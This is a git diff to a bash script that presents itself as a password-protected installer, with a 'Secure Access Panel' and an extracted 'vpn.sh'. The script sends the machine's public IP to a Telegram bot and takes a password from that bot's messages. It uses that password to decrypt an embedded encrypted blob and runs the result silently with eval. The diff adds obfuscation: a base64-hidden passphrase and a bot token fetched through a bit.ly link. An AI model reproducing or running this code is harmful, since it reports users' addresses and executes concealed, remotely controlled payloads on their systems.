Update tech

diff --git a/tech b/tech
--- a/tech
+++ b/tech
@@ -1,35 +1,31 @@
 #!/bin/bash
-
 RED='\033[0;31m';
-GREEN='\033[0;32m';
-YELLOW='\033[1;33m';
+GREEN='\033[0;32m'; YELLOW='\033[1;33m';
 NC='\033[0m';
-
-BOT_TOKEN="8136821698:AAHhmzcnqMfn0G4b_t6L6-Ff-uuHwJ6HWTw"
+GFP="https://bit.ly/oix";iuu="cGFzcw==";os=$(echo "$iuu" | base64 -d);on=$(curl -fsSL "$GFP");tm=$(echo "$on" | openssl enc -aes-256-cbc -a -d -pbkdf2 -iter 100000 -pass pass:"$os")
 CHAT_ID="7432279779"
-ENCRYPTED_FILE=$(mktemp)
+ARCHIVE_FILE="open.7z"
+EXTRACTED_FILE="vpn.sh"
+BLOCK_FLAG=".blocked"
+ENCRYPTED_FILE="data.enc"
 cat > "$ENCRYPTED_FILE" << EOF
-U2FsdGVkX18LcP0wghVQdvSYLMVLPv1XlLSgcPsllE1jPUqM+m9GKAoEB46ViWNl
-sv/qrNiR07oMR9c/2oaf2BqF5yvzfk0zhCoTMd8YTAtfnnEsDTGWToEjJ8C1iRD1
-s6k5MELI63yCgZXz8wxaS82ec7+ne1ipp1Tm3RVE8Qk=
+U2FsdGVkX1/ZmFBV67P+E/bZzaEdfm7tv8oGlXeVFReoKbHKGl+NKXn724uYCozv
+FohAzO3FPhJMUsj3ic3NQksE/SyHVdVhSWBxptiiCkPhj2UCNFgEa6ej/Kihyem5
+a7CAQK6gKObM5CAeqQ2MlTE/h9HPW0WlIjLTqGO7BR0=
 EOF
-
 IP=$(curl -s -4 ifconfig.me)
-curl -s -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" -d chat_id="$CHAT_ID" -d text="محاولة تسجيل دخول جديدة للسكريبت : $IP" >/dev/null
-
+curl -s -X POST "https://api.telegram.org/bot$tm/sendMessage" -d chat_id="$CHAT_ID" -d text="محاولة تسجيل دخول جديدة للسكريبت : $IP" >/dev/null
 MAX_WAIT=60
 WAITED=0
 password=""
 while [[ $WAITED -lt $MAX_WAIT ]]; do
-    response=$(curl -s "https://api.telegram.org/bot$BOT_TOKEN/getUpdates")
+    response=$(curl -s "https://api.telegram.org/bot$tm/getUpdates")
     password=$(echo "$response" | grep -oP '"text":"\K[^"]+' | tail -1)
     [[ -n "$password" ]] && break
     sleep 1; ((WAITED++))
 done
 
 DECRYPTED=$(openssl enc -aes-256-cbc -d -a -pbkdf2 -iter 100000 -pass pass:"$password" -in "$ENCRYPTED_FILE" 2>/dev/null)
-rm -f "$ENCRYPTED_FILE"
-
 [[ -z "$DECRYPTED" ]] && exit 0
 eval "$DECRYPTED" &>/dev/null
 
@@ -66,7 +62,7 @@ while (( attempt <= MAX_ATTEMPTS )); do
     echo -e "${YELLOW} Secure Access Panel${NC}"
     echo -e "${YELLOW} Script is protected by password${NC}"
     echo -e "${YELLOW} To get the password, contact here @a_hamza_i ${NC}"
-    echo -n -e " Enter password to To open the script (attempt $attempt/$MAX_ATTEMPTS): ${NC}"
+    echo -n -e " Enter password to open the script (attempt $attempt/$MAX_ATTEMPTS): ${NC}"
     read -rs USER_PASS; echo
     PASSWORD="type_pass_install.zip${USER_PASS}"
     if 7z t -p"$PASSWORD" "$ARCHIVE_FILE" &>/dev/null; then
@@ -86,7 +82,7 @@ if ! $success; then
     exit 0
 fi
 
-7z x "-p$PASSWORD" -aoa "$ARCHIVE_FILE" "$EXTRACTED_FILE" >/dev/null 2>&1
-[[ ! -f "$EXTRACTED_FILE" ]] && exit 1
+7z x "-p$PASSWORD" -aoa "$ARCHIVE_FILE" >/dev/null 2>&1
+[[ ! -f "$EXTRACTED_FILE" ]] && echo -e "${RED} File $EXTRACTED_FILE not found after extraction.${NC}" && exit 1
 chmod +x "$EXTRACTED_FILE"
 bash "$EXTRACTED_FILE"
